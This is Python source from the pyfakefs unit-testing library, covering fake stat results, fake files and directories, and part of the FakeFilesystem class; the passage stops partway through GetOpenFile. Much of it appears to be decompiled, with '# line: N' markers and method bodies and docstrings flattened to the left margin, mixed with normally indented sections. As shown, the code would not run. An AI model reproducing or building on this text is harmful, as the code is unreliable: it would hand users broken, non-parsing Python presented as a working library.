        self.use_float = FakeOsModule.stat_float_times
        self.st_mode = None
        self.st_ino = None
        self.st_dev = None
        self.st_nlink = 0
        self.st_uid = None
        self.st_gid = None
        self.st_size = None
        if (initial_time is not None):
            # Timestamps are stored internally as integer nanoseconds.
            self._st_atime_ns = self.long_type((initial_time * 1000000000.0))
        else:
            self._st_atime_ns = None
        self._st_mtime_ns = self._st_atime_ns
        self._st_ctime_ns = self._st_atime_ns

    def __eq__(self, other):
        return (isinstance(other, _FakeStatResult) and (self._st_atime_ns == other._st_atime_ns) and (self._st_ctime_ns == other._st_ctime_ns) and (self._st_mtime_ns == other._st_mtime_ns) and (self.st_size == other.st_size) and (self.st_gid == other.st_gid) and (self.st_uid == other.st_uid) and (self.st_nlink == other.st_nlink) and (self.st_dev == other.st_dev) and (self.st_ino == other.st_ino) and (self.st_mode == other.st_mode))

    def __ne__(self, other):
        return (not (self == other))

    def copy(self):
        """Return a copy where the float usage is hard-coded to mimic the behavior
        of the real os.stat_result.
        """
        use_float = self.use_float()
        stat_result = copy(self)
        # Freeze the float/int decision at copy time.
        stat_result.use_float = (lambda : use_float)
        return stat_result

    def set_from_stat_result(self, stat_result):
        """Set values from a real os.stat_result.
        Note: values that are controlled by the fake filesystem are not set.
        This includes st_ino, st_dev and st_nlink.
        """
        self.st_mode = stat_result.st_mode
        self.st_uid = stat_result.st_uid
        self.st_gid = stat_result.st_gid
        self.st_size = stat_result.st_size
        if (sys.version_info < (3, 3)):
            # os.stat_result gained the *_ns fields only in Python 3.3;
            # convert from float seconds on older versions.
            self._st_atime_ns = self.long_type((stat_result.st_atime * 1000000000.0))
            self._st_mtime_ns = self.long_type((stat_result.st_mtime * 1000000000.0))
            self._st_ctime_ns = self.long_type((stat_result.st_ctime * 1000000000.0))
        else:
            self._st_atime_ns = stat_result.st_atime_ns
            self._st_mtime_ns = stat_result.st_mtime_ns
            self._st_ctime_ns = stat_result.st_ctime_ns

    @property
    def st_ctime(self):
        """Return the creation time in seconds."""
        ctime = (self._st_ctime_ns / 1000000000.0)
        return (ctime if self.use_float() else int(ctime))

    @property
    def st_atime(self):
        """Return the access time in seconds."""
        atime = (self._st_atime_ns / 1000000000.0)
        return (atime if self.use_float() else int(atime))

    @property
    def st_mtime(self):
        """Return the modification time in seconds."""
        mtime = (self._st_mtime_ns / 1000000000.0)
        return (mtime if self.use_float() else int(mtime))

    @st_ctime.setter
    def st_ctime(self, val):
        """Set the creation time in seconds."""
        self._st_ctime_ns = self.long_type((val * 1000000000.0))

    @st_atime.setter
    def st_atime(self, val):
        """Set the access time in seconds."""
        self._st_atime_ns = self.long_type((val * 1000000000.0))

    @st_mtime.setter
    def st_mtime(self, val):
        """Set the modification time in seconds."""
        self._st_mtime_ns = self.long_type((val * 1000000000.0))

    def __getitem__(self, item):
        """Implement item access to mimic `os.stat_result` behavior."""
        if (item == stat.ST_MODE):
            return self.st_mode
        if (item == stat.ST_INO):
            return self.st_ino
        if (item == stat.ST_DEV):
            return self.st_dev
        if (item == stat.ST_NLINK):
            return self.st_nlink
        if (item == stat.ST_UID):
            return self.st_uid
        if (item == stat.ST_GID):
            return self.st_gid
        if (item == stat.ST_SIZE):
            return self.st_size
        if (item == stat.ST_ATIME):
            # Item access always returns int times, like os.stat_result.
            return int(self.st_atime)
        if (item == stat.ST_MTIME):
            return int(self.st_mtime)
        if (item == stat.ST_CTIME):
            return int(self.st_ctime)
        # Any other index falls through and yields None.

    if (sys.version_info >= (3, 3)):
        # Nanosecond accessors exist only from Python 3.3 on, mirroring
        # the real os.stat_result.

        @property
        def st_atime_ns(self):
            """Return the access time in nanoseconds."""
            return self._st_atime_ns

        @property
        def st_mtime_ns(self):
            """Return the modification time in nanoseconds."""
            return self._st_mtime_ns

        @property
        def st_ctime_ns(self):
            """Return the creation time in nanoseconds."""
            return self._st_ctime_ns

        @st_atime_ns.setter
        def st_atime_ns(self, val):
            """Set the access time in nanoseconds."""
            self._st_atime_ns = val

        @st_mtime_ns.setter
        def st_mtime_ns(self, val):
            """Set the modification time of the fake file in nanoseconds."""
            self._st_mtime_ns = val

        @st_ctime_ns.setter
        def st_ctime_ns(self, val):
            """Set the creation time of the fake file in nanoseconds."""
            self._st_ctime_ns = val
# line: 337
class FakeFile(object):
# line: 353
"Provides the appearance of a real file.\n\n Attributes currently faked out:\n st_mode: user-specified, otherwise S_IFREG\n st_ctime: the time.time() timestamp of the file change time (updated\n each time a file's attributes is modified).\n st_atime: the time.time() timestamp when the file was last accessed.\n st_mtime: the time.time() timestamp when the file was last modified.\n st_size: the size of the file\n st_nlink: the number of hard links to the file\n st_ino: the inode number - a unique number identifying the file\n st_dev: a unique number identifying the (fake) file system device the file belongs to\n\n Other attributes needed by os.stat are assigned default value of None\n these include: st_uid, st_gid\n "
# line: 355
def __init__(self, name, st_mode=(stat.S_IFREG | PERM_DEF_FILE), contents=None, filesystem=None, encoding=None, errors=None):
# line: 371
'init.\n\n Args:\n name: name of the file/directory, without parent path information\n st_mode: the stat.S_IF* constant representing the file type (i.e.\n stat.S_IFREG, stat.S_IFDIR)\n contents: the contents of the filesystem object; should be a string or byte object for\n regular files, and a list of other FakeFile or FakeDirectory objects\n for FakeDirectory objects\n filesystem: the fake filesystem where the file is created.\n New in pyfakefs 2.9.\n encoding: if contents is a unicode string, the encoding used for serialization\n errors: the error mode used for encoding/decoding errors\n New in pyfakefs 3.2.\n '
# line: 372
self.name = name
# line: 373
self.stat_result = _FakeStatResult(time.time())
# line: 374
self.stat_result.st_mode = st_mode
# line: 375
self.encoding = encoding
# line: 376
self.errors = (errors or 'strict')
# line: 377
self._byte_contents = self._encode_contents(contents)
# line: 378
self.stat_result.st_size = (len(self._byte_contents) if (self._byte_contents is not None) else 0)
# line: 381
if (filesystem is None):
# line: 382
raise ValueError('filesystem shall not be None')
# line: 383
self.filesystem = filesystem
# line: 384
self.epoch = 0
# line: 385
self.parent_dir = None
# line: 387
    @property
    def byte_contents(self):
        """Return the raw byte contents (None for size-only 'large' files)."""
        return self._byte_contents
# line: 391
@property
# line: 391
def contents(self):
# line: 393
'Return the contents as string with the original encoding.'
# line: 394
if ((sys.version_info >= (3, 0)) and isinstance(self.byte_contents, bytes)):
# line: 395
return self.byte_contents.decode((self.encoding or locale.getpreferredencoding(False)), errors=self.errors)
# line: 398
return self.byte_contents
    def SetLargeFileSize(self, st_size):
        """Sets the self.st_size attribute and replaces self.content with None.

        Provided specifically to simulate very large files without regards
        to their content (which wouldn't fit in memory).
        Note that read/write operations with such a file raise
        FakeLargeFileIoException.

        Args:
          st_size: (int) The desired file size.

        Raises:
          IOError: if the st_size is not a non-negative integer,
                   or if st_size exceeds the available file system space.
        """
        self._check_positive_int(st_size)
        if self.st_size:
            # Release the currently accounted space before claiming the new size.
            self.SetSize(0)
        self.filesystem.ChangeDiskUsage(st_size, self.name, self.st_dev)
        self.st_size = st_size
        # None contents is the marker for the "large file without contents" state.
        self._byte_contents = None
# line: 421
def _check_positive_int(self, size):
# line: 423
int_types = ((int, long) if (sys.version_info < (3, 0)) else int)
# line: 424
if ((not isinstance(size, int_types)) or (size < 0)):
# line: 425
raise IOError(errno.ENOSPC, ('Fake file object: size must be a non-negative integer, but is %s' % size), self.name)
# line: 429
def IsLargeFile(self):
# line: 430
'Return True if this file was initialized with size but no contents.'
# line: 431
return (self._byte_contents is None)
    def _encode_contents(self, contents):
        # Serialize text contents to bytes using the file's encoding (or the
        # locale preferred encoding); bytes and None pass through unchanged.
        if ((sys.version_info >= (3, 0)) and isinstance(contents, str)):
            contents = bytes(contents, (self.encoding or locale.getpreferredencoding(False)), self.errors)
        elif ((sys.version_info < (3, 0)) and isinstance(contents, unicode)):
            # Python 2 equivalent of the branch above.
            contents = contents.encode((self.encoding or locale.getpreferredencoding(False)), self.errors)
        return contents
    def _set_initial_contents(self, contents):
        """Sets the file contents and size.
        Called internally after initial file creation.

        Args:
          contents: string, new content of file.

        Raises:
          IOError: if the st_size is not a non-negative integer,
                   or if st_size exceeds the available file system space.
        """
        contents = self._encode_contents(contents)
        st_size = len(contents)
        if self._byte_contents:
            # Free the space held by the old contents first.
            self.SetSize(0)
        current_size = (self.st_size or 0)
        # Charge the size delta to the device; may raise IOError(ENOSPC).
        self.filesystem.ChangeDiskUsage((st_size - current_size), self.name, self.st_dev)
        self._byte_contents = contents
        self.st_size = st_size
        self.epoch += 1
# line: 462
def SetContents(self, contents, encoding=None):
# line: 475
'Sets the file contents and size and increases the modification time.\n\n Args:\n contents: (str, bytes, unicode) new content of file.\n encoding: (str) the encoding to be used for writing the contents\n if they are a unicode string.\n If not given, the locale preferred encoding is used.\n New in pyfakefs 2.9.\n\n Raises:\n IOError: if the st_size is not a non-negative integer,\n or if st_size exceeds the available file system space.\n '
# line: 476
self.encoding = encoding
# line: 477
self._set_initial_contents(contents)
# line: 478
current_time = time.time()
# line: 479
self.st_ctime = current_time
# line: 480
self.st_mtime = current_time
# line: 482
def GetSize(self):
# line: 485
'Returns the size in bytes of the file contents.\n New in pyfakefs 2.9.\n '
# line: 486
return self.st_size
# line: 488
def GetPath(self):
# line: 489
'Return the full path of the current object.'
# line: 490
names = []
# line: 491
obj = self
# line: 492
while obj:
# line: 493
names.insert(0, obj.name)
# line: 494
obj = obj.parent_dir
# line: 495
sep = self.filesystem._path_separator(self.name)
# line: 496
return self.filesystem.NormalizePath(sep.join(names[1:]))
# line: 498
def SetSize(self, st_size):
# line: 507
'Resizes file content, padding with nulls if new size exceeds the old.\n\n Args:\n st_size: The desired size for the file.\n\n Raises:\n IOError: if the st_size arg is not a non-negative integer\n or if st_size exceeds the available file system space\n '
# line: 509
self._check_positive_int(st_size)
# line: 510
current_size = (self.st_size or 0)
# line: 511
self.filesystem.ChangeDiskUsage((st_size - current_size), self.name, self.st_dev)
# line: 512
if self._byte_contents:
# line: 513
if (st_size < current_size):
# line: 514
self._byte_contents = self._byte_contents[:st_size]
elif (sys.version_info < (3, 0)):
# line: 517
self._byte_contents = ('%s%s' % (self._byte_contents, ('\x00' * (st_size - current_size))))
else:
# line: 520
self._byte_contents += ('\x00' * (st_size - current_size))
# line: 521
self.st_size = st_size
# line: 522
self.epoch += 1
# line: 524
def SetATime(self, st_atime):
# line: 529
'Set the self.st_atime attribute.\n\n Args:\n st_atime: The desired access time.\n '
# line: 530
self.st_atime = st_atime
# line: 532
def SetMTime(self, st_mtime):
# line: 537
'Set the self.st_mtime attribute.\n\n Args:\n st_mtime: The desired modification time.\n '
# line: 538
self.st_mtime = st_mtime
# line: 540
def SetCTime(self, st_ctime):
# line: 546
'Set the self.st_ctime attribute.\n New in pyfakefs 3.0.\n\n Args:\n st_ctime: The desired creation time.\n '
# line: 547
self.st_ctime = st_ctime
    def __getattr__(self, item):
        """Forward some properties to stat_result."""
        # Only invoked for attributes not found on the instance itself, so
        # st_* reads fall through to the stat_result object.
        return getattr(self.stat_result, item)
    def __setattr__(self, key, value):
        """Forward some properties to stat_result."""
        # st_* attributes live on the stat_result object, not on the instance;
        # everything else is stored normally.
        if (key in ('st_mode', 'st_ino', 'st_dev', 'st_nlink', 'st_uid', 'st_gid', 'st_size', 'st_atime', 'st_mtime', 'st_ctime', 'st_atime_ns', 'st_mtime_ns', 'st_ctime_ns')):
            return setattr(self.stat_result, key, value)
        return super(FakeFile, self).__setattr__(key, value)
# line: 561
def __str__(self):
# line: 562
return ('%s(%o)' % (self.name, self.st_mode))
# line: 564
def SetIno(self, st_ino):
# line: 571
'Set the self.st_ino attribute.\n Note that a unique inode is assigned automatically to a new fake file.\n Using this function does not guarantee uniqueness and should used with caution.\n\n Args:\n st_ino: (int) The desired inode.\n '
# line: 572
self.st_ino = st_ino
class FakeFileFromRealFile(FakeFile):
    """Represents a fake file copied from the real file system.

    The contents of the file are read on demand only.
    New in pyfakefs 3.2.
    """

    def __init__(self, file_path, filesystem, read_only=True):
        """init.

        Args:
          file_path: path to the existing file.
          filesystem: the fake filesystem where the file is created.
          read_only: if set, the file is treated as read-only, e.g. a write
            access raises an exception; otherwise, writing to the file changes
            the fake file only as usually.

        Raises:
          OSError: if the file does not exist in the real file system.
        """
        real_stat = os.stat(file_path)
        # No contents are passed to the base class; they are loaded lazily
        # by the byte_contents property below.
        super(FakeFileFromRealFile, self).__init__(name=os.path.basename(file_path), filesystem=filesystem)
        self.stat_result.set_from_stat_result(real_stat)
        if read_only:
            # 261924 == 0o777444: keep the file-type/suid bits and the read
            # bits, clearing all write and execute permission bits.
            self.st_mode &= 261924
        self.file_path = file_path
        self.contents_read = False

    @property
    def byte_contents(self):
        # Lazy load: the real file is read exactly once, on first access.
        if (not self.contents_read):
            self.contents_read = True
            with io.open(self.file_path, 'rb') as f:
                self._byte_contents = f.read()
        # Keep the fake access time in sync with the real file.
        self.st_atime = os.stat(self.file_path).st_atime
        return self._byte_contents

    def IsLargeFile(self):
        """The contents are never faked."""
        return False
class FakeDirectory(FakeFile):
    """Provides the appearance of a real directory."""

    def __init__(self, name, perm_bits=PERM_DEF, filesystem=None):
        """init.

        Args:
          name: name of the file/directory, without parent path information.
          perm_bits: permission bits. defaults to 0o777.
          filesystem: if set, the fake filesystem where the directory is created.
        """
        # A directory is a FakeFile whose contents are a dict of child entries.
        FakeFile.__init__(self, name, (stat.S_IFDIR | perm_bits), {}, filesystem=filesystem)
        # Extra hard-link count for the directory entry itself.
        self.st_nlink += 1

    def SetContents(self, contents, encoding=None):
        # Directories cannot take file-style contents; mirror the error type
        # raised by the real OS (OSError on Windows, IOError elsewhere).
        error_class = (OSError if self.filesystem.is_windows_fs else IOError)
        raise error_class(errno.EISDIR, 'Trying to write to directory')

    @property
    def contents(self):
        """Return the mapping of names to contained directory entries."""
        return self.byte_contents

    @property
    def ordered_dirs(self):
        """Return the list of contained directory entry names ordered by creation order."""
        # st_ino is assigned sequentially at creation time, so sorting by it
        # reproduces creation order.
        return [item[0] for item in sorted(self.byte_contents.items(), key=(lambda entry: entry[1].st_ino))]

    def AddEntry(self, path_object):
        """Adds a child FakeFile to this directory.

        Args:
          path_object: FakeFile instance to add as a child of this directory.

        Raises:
          OSError: if the directory has no write permission (Posix only).
          OSError: if the file or directory to be added already exists.
        """
        if ((not (self.st_mode & PERM_WRITE)) and (not self.filesystem.is_windows_fs)):
            raise OSError(errno.EACCES, 'Permission Denied', self.GetPath())
        if (path_object.name in self.contents):
            raise OSError(errno.EEXIST, 'Object already exists in fake filesystem', self.GetPath())
        self.contents[path_object.name] = path_object
        path_object.parent_dir = self
        self.st_nlink += 1
        path_object.st_nlink += 1
        path_object.st_dev = self.st_dev
        if (path_object.st_nlink == 1):
            # First link to this object: charge its size to the device.
            self.filesystem.ChangeDiskUsage(path_object.GetSize(), path_object.name, self.st_dev)

    def GetEntry(self, pathname_name):
        """Retrieves the specified child file or directory entry.

        Args:
          pathname_name: basename of the child object to retrieve.

        Returns:
          fake file or directory object.

        Raises:
          KeyError: if no child exists by the specified name.
        """
        return self.contents[pathname_name]

    def RemoveEntry(self, pathname_name, recursive=True):
        """Removes the specified child file or directory.

        Args:
          pathname_name: basename of the child object to remove.
          recursive: if True (default), the entries in contained directories
            are deleted first. Needed to propagate removal errors
            (e.g. permission problems) from contained entries.
            New in pyfakefs 2.9.

        Raises:
          KeyError: if no child exists by the specified name.
          OSError: if user lacks permission to delete the file,
            or (Windows only) the file is open.
        """
        entry = self.contents[pathname_name]
        if ((entry.st_mode & PERM_WRITE) == 0):
            raise OSError(errno.EACCES, 'Trying to remove object without write permission', pathname_name)
        if (self.filesystem.is_windows_fs and self.filesystem.HasOpenFile(entry)):
            raise OSError(errno.EACCES, 'Trying to remove an open file', pathname_name)
        if (recursive and isinstance(entry, FakeDirectory)):
            # Remove children one by one so per-entry errors propagate.
            while entry.contents:
                entry.RemoveEntry(list(entry.contents)[0])
        elif (entry.st_nlink == 1):
            # Last hard link: give the space back to the device.
            self.filesystem.ChangeDiskUsage((- entry.GetSize()), pathname_name, entry.st_dev)
        self.st_nlink -= 1
        entry.st_nlink -= 1
        assert (entry.st_nlink >= 0)
        del self.contents[pathname_name]

    def GetSize(self):
        """Return the total size of all files contained in this directory tree.
        New in pyfakefs 2.9.
        """
        return sum([item[1].GetSize() for item in self.contents.items()])

    def HasParentObject(self, dir_object):
        """Return `True` if dir_object is a direct or indirect parent directory,
        or if both are the same object."""
        obj = self
        while obj:
            if (obj == dir_object):
                return True
            obj = obj.parent_dir
        return False

    def __str__(self):
        # Render this entry followed by all children, indented one level.
        # NOTE(review): upstream pyfakefs indents children with two spaces;
        # the single space here may be a whitespace-collapse artifact of the
        # decompiled source -- verify against the original.
        description = (super(FakeDirectory, self).__str__() + ':\n')
        for item in self.contents:
            item_desc = self.contents[item].__str__()
            for line in item_desc.split('\n'):
                if line:
                    description = (((description + ' ') + line) + '\n')
        return description
class FakeDirectoryFromRealDirectory(FakeDirectory):
    """Represents a fake directory copied from the real file system.

    The contents of the directory are read on demand only.
    New in pyfakefs 3.2.
    """

    def __init__(self, dir_path, filesystem, read_only):
        """init.

        Args:
          dir_path: full directory path.
          filesystem: the fake filesystem where the directory is created.
          read_only: if set, all files under the directory are treated as
            read-only, e.g. a write access raises an exception; otherwise,
            writing to the files changes the fake files only as usually.

        Raises:
          OSError: if the directory does not exist in the real file system.
        """
        real_stat = os.stat(dir_path)
        super(FakeDirectoryFromRealDirectory, self).__init__(name=os.path.split(dir_path)[1], perm_bits=real_stat.st_mode, filesystem=filesystem)
        # Mirror the real directory's timestamps and ownership.
        self.st_ctime = real_stat.st_ctime
        self.st_atime = real_stat.st_atime
        self.st_mtime = real_stat.st_mtime
        self.st_gid = real_stat.st_gid
        self.st_uid = real_stat.st_uid
        self.dir_path = dir_path
        self.read_only = read_only
        self.contents_read = False

    @property
    def contents(self):
        """Return the contained directory entries, loading them if not already loaded."""
        if (not self.contents_read):
            self.contents_read = True
            # Lazily fake all real entries below this directory on first access.
            self.filesystem.add_real_paths([os.path.join(self.dir_path, entry) for entry in os.listdir(self.dir_path)], read_only=self.read_only)
        return self.byte_contents

    def GetSize(self):
        # Report 0 for a not-yet-loaded directory to avoid triggering a
        # (possibly expensive) scan of the real directory tree.
        if (not self.contents_read):
            return 0
        return super(FakeDirectoryFromRealDirectory, self).GetSize()
# line: 798
class FakeFilesystem(object):
# line: 809
'Provides the appearance of a real directory tree for unit testing.\n\n Attributes:\n path_separator: The path separator, corresponds to `os.path.sep`.\n alternative_path_separator: Corresponds to `os.path.altsep`.\n is_windows_fs: `True` in a Windows file system, `False` otherwise.\n is_case_sensitive: `True` if a case-sensitive file system is assumed.\n root: The root `FakeDirectory` entry of the file system.\n cwd: The current working directory path.\n umask: The umask used for newly created files, see `os.umask`.\n '
    def __init__(self, path_separator=os.path.sep, total_size=None):
        """init.

        Args:
          path_separator: optional substitute for os.path.sep.
          total_size: if not None, the total size in bytes of the
            root filesystem. New in pyfakefs 2.9.

        Example usage to emulate real file systems:
          filesystem = FakeFilesystem(
              alt_path_separator='/' if _is_windows else None)
        """
        self.path_separator = path_separator
        self.alternative_path_separator = os.path.altsep
        if (path_separator != os.sep):
            # A custom separator disables the real OS's alternative separator.
            self.alternative_path_separator = None
        self.is_windows_fs = (sys.platform == 'win32')
        self.is_case_sensitive = (sys.platform not in ['win32', 'cygwin', 'darwin'])
        self.root = FakeDirectory(self.path_separator, filesystem=self)
        self.cwd = self.root.name
        # Read the real process umask without changing it: os.umask both sets
        # the mask and returns the previous one, so set it back immediately.
        self.umask = os.umask(18)
        os.umask(self.umask)
        # Open file objects, indexed by file descriptor number.
        self.open_files = []
        # Heap of descriptors freed by CloseOpenFile; reused lowest-first.
        self._free_fd_heap = []
        # Last assigned inode and device numbers.
        self._last_ino = 0
        self._last_dev = 0
        self.mount_points = {}
        self.AddMountPoint(self.root.name, total_size)
    @staticmethod
    def _matching_string(matched, string):
        """Return the string as byte or unicode depending
        on the type of matched, assuming string is an ASCII string.
        """
        if (string is None):
            return string
        if (sys.version_info < (3,)):
            # Python 2: promote to unicode only if the matched value is unicode.
            if isinstance(matched, unicode):
                return unicode(string)
            else:
                return string
        elif isinstance(matched, bytes):
            # Python 3: encode to bytes if the matched value is bytes.
            return bytes(string, 'ascii')
        else:
            return string
# line: 872
def _path_separator(self, path):
# line: 873
'Return the path separator as the same type as path'
# line: 874
return self._matching_string(path, self.path_separator)
# line: 876
def _alternative_path_separator(self, path):
# line: 877
'Return the alternative path separator as the same type as path'
# line: 878
return self._matching_string(path, self.alternative_path_separator)
# line: 880
def _IsLinkSupported(self):
# line: 882
return ((not self.is_windows_fs) or (sys.version_info >= (3, 2)))
    def AddMountPoint(self, path, total_size=None):
        """Add a new mount point for a filesystem device.
        The mount point gets a new unique device number.
        New in pyfakefs 2.9.

        Args:
          path: The root path for the new mount path.
          total_size: The new total size of the added filesystem device
            in bytes. Defaults to infinite size.

        Returns:
          The newly created mount point dict.

        Raises:
          OSError: if trying to mount an existing mount point again.
        """
        path = self.NormalizePath(path)
        if (path in self.mount_points):
            raise OSError(errno.EEXIST, 'Mount point cannot be added twice', path)
        self._last_dev += 1
        self.mount_points[path] = {'idev': self._last_dev, 'total_size': total_size, 'used_size': 0, }
        # Create the mount root directory if needed and tag it with the new
        # device id (the filesystem root is reused for the root mount).
        root_dir = (self.root if (path == self.root.name) else self.CreateDirectory(path))
        root_dir.st_dev = self._last_dev
        return self.mount_points[path]
# line: 913
def _AutoMountDriveIfNeeded(self, path, force=False):
# line: 914
if (self.is_windows_fs and (force or (not self._MountPointForPath(path)))):
# line: 915
drive = self.SplitDrive(path)[0]
# line: 916
if drive:
# line: 917
return self.AddMountPoint(path=drive)
    def _MountPointForPath(self, path):
        """Return the mount point dict responsible for the given path."""
        def to_str(string):
            """Convert the str, unicode or byte object to a str using the default encoding."""
            if ((string is None) or isinstance(string, str)):
                return string
            if (sys.version_info < (3, 0)):
                return string.encode(locale.getpreferredencoding(False))
            else:
                return string.decode(locale.getpreferredencoding(False))

        path = self.NormalizePath(self.NormalizeCase(path))
        # Exact match first.
        if (path in self.mount_points):
            return self.mount_points[path]
        # Otherwise find the longest mount path that is a prefix of path.
        mount_path = self._matching_string(path, '')
        # SplitDrive(...)[:1] yields a 1-tuple; str.startswith accepts a
        # tuple of prefixes, so this checks the drive prefix below.
        drive = self.SplitDrive(path)[:1]
        for root_path in self.mount_points:
            root_path = self._matching_string(path, root_path)
            if (drive and (not root_path.startswith(drive))):
                continue
            if (path.startswith(root_path) and (len(root_path) > len(mount_path))):
                mount_path = root_path
        if mount_path:
            return self.mount_points[to_str(mount_path)]
        # No known mount point: auto-mount the path's drive (Windows only).
        mount_point = self._AutoMountDriveIfNeeded(path, force=True)
        assert mount_point
        return mount_point
# line: 946
def _MountPointForDevice(self, idev):
# line: 947
for mount_point in self.mount_points.values():
# line: 948
if (mount_point['idev'] == idev):
# line: 949
return mount_point
    def GetDiskUsage(self, path=None):
        """Return the total, used and free disk space in bytes as named tuple,
        or placeholder values simulating unlimited space if not set.
        Note: This matches the return value of shutil.disk_usage().
        New in pyfakefs 2.9.

        Args:
          path: The disk space is returned for the file system device where
            path resides.
            Defaults to the root path (e.g. '/' on Unix systems).
        """
        DiskUsage = namedtuple('usage', 'total, used, free')
        if (path is None):
            mount_point = self.mount_points[self.root.name]
        else:
            mount_point = self._MountPointForPath(path)
        if (mount_point and (mount_point['total_size'] is not None)):
            return DiskUsage(mount_point['total_size'], mount_point['used_size'], (mount_point['total_size'] - mount_point['used_size']))
        # No size limit configured: report 1 TiB total with nothing used.
        return DiskUsage((((1024 * 1024) * 1024) * 1024), 0, (((1024 * 1024) * 1024) * 1024))
    def SetDiskUsage(self, total_size, path=None):
        """Changes the total size of the file system, preserving the used space.
        Example usage: set the size of an auto-mounted Windows drive.
        New in pyfakefs 2.9.

        Args:
          total_size: The new total size of the filesystem in bytes.
          path: The disk space is changed for the file system device where
            path resides.
            Defaults to the root path (e.g. '/' on Unix systems).

        Raises:
          IOError: if the new space is smaller than the used size.
        """
        if (path is None):
            path = self.root.name
        mount_point = self._MountPointForPath(path)
        # Shrinking below the currently used space is rejected.
        if ((mount_point['total_size'] is not None) and (mount_point['used_size'] > total_size)):
            raise IOError(errno.ENOSPC, ('Fake file system: cannot change size to %r bytes - used space is larger' % total_size), path)
        mount_point['total_size'] = total_size
# line: 996
def ChangeDiskUsage(self, usage_change, file_path, st_dev):
# line: 1010
'Change the used disk space by the given amount.\n New in pyfakefs 2.9.\n\n Args:\n usage_change: Number of bytes added to the used space.\n If negative, the used space will be decreased.\n\n file_path: The path of the object needing the disk space.\n\n st_dev: The device ID for the respective file system.\n\n Raises:\n IOError: if usage_change exceeds the free file system space\n '
# line: 1011
mount_point = self._MountPointForDevice(st_dev)
# line: 1012
if mount_point:
# line: 1013
if (mount_point['total_size'] is not None):
# line: 1014
if ((mount_point['total_size'] - mount_point['used_size']) < usage_change):
# line: 1015
raise IOError(errno.ENOSPC, ('Fake file system: disk is full, failed to add %r bytes' % usage_change), file_path)
# line: 1018
mount_point['used_size'] += usage_change
# line: 1020
def GetStat(self, entry_path, follow_symlinks=True):
# line: 1034
"Return the os.stat-like tuple for the FakeFile object of entry_path.\n New in pyfakefs 3.0.\n\n Args:\n entry_path: path to filesystem object to retrieve.\n follow_symlinks: if False and entry_path points to a symlink, the link itself is inspected\n instead of the linked object.\n\n Returns:\n the FakeStatResult object corresponding to entry_path.\n\n Raises:\n OSError: if the filesystem object doesn't exist.\n "
# line: 1036
try:
# line: 1037
file_object = self.ResolveObject(entry_path, follow_symlinks, allow_fd=True)
# line: 1038
return file_object.stat_result.copy()
# line: 1039
except IOError as io_error:
# line: 1040
raise OSError(io_error.errno, io_error.strerror, entry_path)
    def ChangeMode(self, path, mode, follow_symlinks=True):
        """Change the permissions of a file as encoded in integer mode.
        New in pyfakefs 3.0.

        Args:
          path: (str) Path to the file.
          mode: (int) Permissions.
          follow_symlinks: if False and entry_path points to a symlink,
            the link itself is affected instead of the linked object.

        Raises:
          OSError: if the object at path does not exist.
        """
        try:
            file_object = self.ResolveObject(path, follow_symlinks, allow_fd=True)
        except IOError as io_error:
            if (io_error.errno == errno.ENOENT):
                raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
            raise
        # Replace only the permission bits, preserving the file-type bits.
        file_object.st_mode = ((file_object.st_mode & (~ PERM_ALL)) | (mode & PERM_ALL))
        file_object.st_ctime = time.time()
    def UpdateTime(self, path, times=None, ns=None, follow_symlinks=True):
        """Change the access and modified times of a file.
        New in pyfakefs 3.0.

        Args:
          path: (str) Path to the file.
          times: 2-tuple of int or float numbers, of the form (atime, mtime)
            which is used to set the access and modified times in seconds.
            If None, both times are set to the current time.
          ns: 2-tuple of int numbers, of the form (atime, mtime) which is
            used to set the access and modified times in nanoseconds.
            If None, both times are set to the current time.
            New in Python 3.3. New in pyfakefs 3.3.
          follow_symlinks: If `False` and entry_path points to a symlink,
            the link itself is queried instead of the linked object.
            New in Python 3.3. New in pyfakefs 3.0.

        Raises:
          TypeError: If anything other than the expected types is
            specified in the passed `times` or `ns` tuple,
            or if the tuple length is not equal to 2.
          ValueError: If both times and ns are specified.
        """
        # 'times' and 'ns' are mutually exclusive, mirroring os.utime.
        if ((times is not None) and (ns is not None)):
            raise ValueError("utime: you may specify either 'times' or 'ns' but not both")
        if ((times is not None) and (len(times) != 2)):
            raise TypeError("utime: 'times' must be either a tuple of two ints or None")
        if ((ns is not None) and (len(ns) != 2)):
            raise TypeError("utime: 'ns' must be a tuple of two ints")
        try:
            file_object = self.ResolveObject(path, follow_symlinks, allow_fd=True)
        except IOError as io_error:
            if (io_error.errno == errno.ENOENT):
                raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
            raise
        if (times is not None):
            for file_time in times:
                if (not isinstance(file_time, (int, float))):
                    raise TypeError('atime and mtime must be numbers')
            file_object.st_atime = times[0]
            file_object.st_mtime = times[1]
        elif (ns is not None):
            for file_time in ns:
                if (not isinstance(file_time, int)):
                    raise TypeError('atime and mtime must be ints')
            file_object.st_atime_ns = ns[0]
            file_object.st_mtime_ns = ns[1]
        else:
            # Neither argument given: set both timestamps to 'now'.
            current_time = time.time()
            file_object.st_atime = current_time
            file_object.st_mtime = current_time
# line: 1121
def SetIno(self, path, st_ino):
# line: 1129
"Set the self.st_ino attribute of file at 'path'.\n Note that a unique inode is assigned automatically to a new fake file.\n Using this function does not guarantee uniqueness and should used with caution.\n\n Args:\n path: Path to file.\n st_ino: The desired inode.\n "
# line: 1130
self.GetObject(path).SetIno(st_ino)
# line: 1132
def AddOpenFile(self, file_obj):
# line: 1142
'Add file_obj to the list of open files on the filesystem.\n\n The position in the self.open_files array is the file descriptor number.\n\n Args:\n file_obj: file object to be added to open files list.\n\n Returns:\n File descriptor number for the file object.\n '
# line: 1143
if self._free_fd_heap:
# line: 1144
open_fd = heapq.heappop(self._free_fd_heap)
# line: 1145
self.open_files[open_fd] = file_obj
# line: 1146
return open_fd
# line: 1148
self.open_files.append(file_obj)
# line: 1149
return (len(self.open_files) - 1)
# line: 1151
def CloseOpenFile(self, file_des):
# line: 1158
'Remove file object with given descriptor from the list of open files.\n\n Sets the entry in open_files to None.\n\n Args:\n file_des: descriptor of file object to be removed from open files list.\n '
# line: 1159
self.open_files[file_des] = None
# line: 1160
heapq.heappush(self._free_fd_heap, file_des)
    def GetOpenFile(self, file_des):
        """Return an open file.

        Args:
          file_des: file descriptor of the open file.

        Raises:
          OSError: an invalid file descriptor.
          TypeError: filedes is not an integer.

        Returns:
          Open file object.
        """
        if (not isinstance(file_des, int)):
            raise TypeError('an integer is required')
        # NOTE(review): a negative descriptor is not rejected here and would
        # index from the end of open_files -- confirm callers never pass one.
